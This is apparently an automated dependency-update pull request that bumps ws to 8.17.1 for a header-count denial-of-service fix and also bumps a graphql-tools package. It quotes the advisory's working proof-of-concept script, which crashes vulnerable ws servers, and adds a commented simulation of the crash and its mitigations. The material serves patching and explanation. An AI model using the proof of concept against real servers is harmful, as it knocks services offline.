[Security] Bump ws and @graphql-tools/executor-legacy-ws in /ui
Bumps ws and @graphql-tools/executor-legacy-ws. These dependencies needed to be updated together.
Updates ws from 8.14.2 to 8.17.1. This update includes a security fix.
Vulnerabilities fixed
ws affected by a DoS when handling a request with many HTTP headers
Impact
A request with a number of headers exceeding the server.maxHeadersCount threshold could be used to crash a ws server.
Proof of concept
The proof of concept is reproduced in full in the 8.17.1 release notes below.
Patched versions: 8.17.1 Affected versions: >= 8.0.0, < 8.17.1
Release notes
Sourced from ws's releases.
8.17.1
Bug fixes
- Fixed a DoS vulnerability (#2231).
A request with a number of headers exceeding the server.maxHeadersCount threshold could be used to crash a ws server.

```js
const http = require('http');
const WebSocket = require('ws');

const wss = new WebSocket.Server({ port: 0 }, function () {
  // Build 2000 distinct two-character header names from the HTTP token alphabet.
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';
      if (++count === 2000) break;
    }
  }

  // The real handshake headers are sent after the 2000 filler headers,
  // i.e. past the server.maxHeadersCount threshold.
  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });

  request.end();
});
```
The vulnerability was reported by Ryan LaPointe in websockets/ws#2230.
In vulnerable versions of ws, the issue can be mitigated in the following ways:
- Reduce the maximum allowed length of the request headers using the --max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent.
... (truncated)
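The crash path described in the advisory and the release notes above, together with the maxHeaderSize mitigation, as an added example (not code from ws, @graphql-tools or this PR) that models both with plain functions so it runs without opening sockets. It assumes, as we understand Node's HTTP parser, that the first server.maxHeadersCount header pairs are kept in arrival order and the rest dropped, with names lowercased in req.headers; `checkUpgradeUnguarded` is illustrative of the failure pattern rather than ws's own source; the byte count is an estimate of the header block as sent; and `buildPocHeaders`, `keptHeaders`, `headerBlockBytes` and `simulate` are names chosen here.

```javascript
'use strict';

// Added example, not code from ws, @graphql-tools or this PR. It models the
// advisory's failure mode with plain functions so it runs without sockets.
// Assumptions (ours): Node keeps the first server.maxHeadersCount header
// pairs in arrival order and drops the rest, lowercasing names in
// req.headers; the byte estimate counts "name: value\r\n" per header line.

const DEFAULT_MAX_HEADERS_COUNT = 2000; // Node's default server.maxHeadersCount
const DEFAULT_MAX_HEADER_SIZE = 16384;  // Node's default --max-http-header-size

// The header block the proof of concept sends, in wire order: `junkCount`
// two-character names from the HTTP token alphabet, then the real handshake.
function buildPocHeaders(junkCount = 2000) {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const pairs = [];
  for (let i = 0; i < chars.length && pairs.length < junkCount; i++) {
    for (let j = 0; j < chars.length && pairs.length < junkCount; j++) {
      pairs.push([chars[i] + chars[j], 'x']);
    }
  }
  pairs.push(['Connection', 'Upgrade']);
  pairs.push(['Upgrade', 'websocket']);
  pairs.push(['Sec-WebSocket-Key', 'dGhlIHNhbXBsZSBub25jZQ==']);
  pairs.push(['Sec-WebSocket-Version', '13']);
  return pairs;
}

// What reaches req.headers: the first maxHeadersCount pairs (0 means no limit).
function keptHeaders(pairs, maxHeadersCount = DEFAULT_MAX_HEADERS_COUNT) {
  const limit = maxHeadersCount > 0 ? Math.min(pairs.length, maxHeadersCount) : pairs.length;
  const headers = {};
  for (const [name, value] of pairs.slice(0, limit)) {
    headers[name.toLowerCase()] = value;
  }
  return headers;
}

// Rough size of the header block on the wire, for comparison with maxHeaderSize.
function headerBlockBytes(pairs) {
  return pairs.reduce((total, [name, value]) => total + name.length + 2 + value.length + 2, 0);
}

// Illustrative of the pre-8.17.1 failure (not ws's source): a handshake check
// that dereferences req.headers.upgrade without testing for undefined throws a
// TypeError, which takes the process down if nothing catches it.
function checkUpgradeUnguarded(headers) {
  return headers.upgrade.toLowerCase() === 'websocket';
}

// Hardened check: an absent or wrong Upgrade header is a 400, never a crash.
function checkUpgradeGuarded(headers) {
  const upgrade = headers.upgrade;
  if (upgrade === undefined || upgrade.toLowerCase() !== 'websocket') {
    return { ok: false, status: 400, reason: 'Missing or invalid Upgrade header' };
  }
  return { ok: true };
}

// Outcome of one request against a server with the given limits:
//   'rejected-by-parser'  header block over maxHeaderSize; never reaches the handler
//   'crash'               unguarded check threw on a missing Upgrade header
//   'rejected-400'        handler refused the handshake cleanly
//   'handshake'           handshake proceeds
function simulate(pairs, { guarded, maxHeadersCount = DEFAULT_MAX_HEADERS_COUNT, maxHeaderSize = DEFAULT_MAX_HEADER_SIZE }) {
  if (headerBlockBytes(pairs) > maxHeaderSize) return 'rejected-by-parser';
  const headers = keptHeaders(pairs, maxHeadersCount);
  if (guarded) return checkUpgradeGuarded(headers).ok ? 'handshake' : 'rejected-400';
  try {
    return checkUpgradeUnguarded(headers) ? 'handshake' : 'rejected-400';
  } catch (err) {
    if (err instanceof TypeError) return 'crash';
    throw err;
  }
}

if (typeof require !== 'undefined' && require.main === module) {
  const poc = buildPocHeaders();
  console.log(`PoC header block: ${headerBlockBytes(poc)} bytes in ${poc.length} headers`);
  console.log('vulnerable server, defaults:   ', simulate(poc, { guarded: false }));
  console.log('fixed server, defaults:        ', simulate(poc, { guarded: true }));
  console.log('vulnerable, maxHeaderSize=8192:', simulate(poc, { guarded: false, maxHeaderSize: 8192 }));
  console.log('vulnerable, maxHeadersCount=0: ', simulate(poc, { guarded: false, maxHeadersCount: 0 }));
}
```

Running it shows why the default limits do not help each other: the proof-of-concept block is roughly 14 KB, so it passes the 16 KiB header-size cap, yet its Upgrade header falls past the 2000-pair count limit and is dropped before ws sees the request. Lowering maxHeaderSize to 8 KiB stops the same request at the parser, which is the mitigation the release notes give. Our further observation, not part of the truncated list above: setting server.maxHeadersCount to 0 keeps every header so the handshake completes, with memory still bounded by maxHeaderSize.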
Commits
- 3c56601 [dist] 8.17.1
- e55e510 [security] Fix crash when the Upgrade header cannot be read (#2231)
- 6a00029 [test] Increase code coverage
- ddfe4a8 [perf] Reduce the amount of crypto.randomFillSync() calls
- b73b118 [dist] 8.17.0
- 29694a5 [test] Use the highWaterMark variable
- 934c9d6 [ci] Test on node 22
- 1817bac [ci] Do not test on node 21
- 96c9b3d [major] Flip the default value of allowSynchronousEvents (#2221)
- e5f32c7 [fix] Emit at most one event per event loop iteration (#2218)
- Additional commits viewable in compare view
Updates @graphql-tools/executor-legacy-ws from 1.0.4 to 1.0.6.
Changelog
Sourced from @graphql-tools/executor-legacy-ws's changelog.
1.0.6
Patch Changes
- #5913 83c0af0 Thanks @enisdenjo! - dependencies updates:
  - Updated dependency @graphql-tools/utils@^10.0.13 (from ^10.0.0, in dependencies)
1.0.5
Patch Changes
- #5762 701cfd3 Thanks @renovate! - dependencies updates:
  - Updated dependency ws@8.15.0 (from 8.14.2, in dependencies)
Commits
- f59d7d7 chore(release): update monorepo packages versions (#5929)
- 83c0af0 No unnecessary inline fragment spreads for union types in federation and link...
- a3259da chore(release): update monorepo packages versions (#5763)
- 38a92ab Use ranged dependencies
- 701cfd3 fix(deps): update dependency ws to v8.15.0 (#5762)
- See full diff in compare view